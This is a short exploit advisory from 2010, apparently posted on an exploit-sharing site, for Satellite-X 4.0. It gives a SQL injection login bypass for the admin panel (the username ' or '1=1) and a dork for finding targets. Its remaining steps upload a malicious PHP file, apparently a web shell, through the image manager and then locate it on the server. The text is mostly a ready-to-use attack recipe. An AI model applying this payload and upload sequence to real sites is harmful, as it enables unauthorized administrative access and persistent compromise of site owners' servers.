Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability
Posted on 30 March 2010
========================================================= Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability ========================================================= ======================================================================================== | # Title : Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iqs3cur1ty.com | # Web Site : | # Dork : 2009 © Satellite-X | # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu) | # Bug : (Auth Bypass) SQL Injection ====================== Exploit By indoushka ================================= # Exploit : 1 - http://127.0.0.1/satallitex/admin/index.php 2 - username : ' or '1=1 password : 1nd0u 3 - Go To http://127.0.0.1/satallitex/admin/index.php?config=imagesman (2 Upload Ev!l) 4 - http://127.0.0.1/satallitex/img/Ch99.php (2 Find Ev!l) # Inj3ct0r.com [2010-03-30]
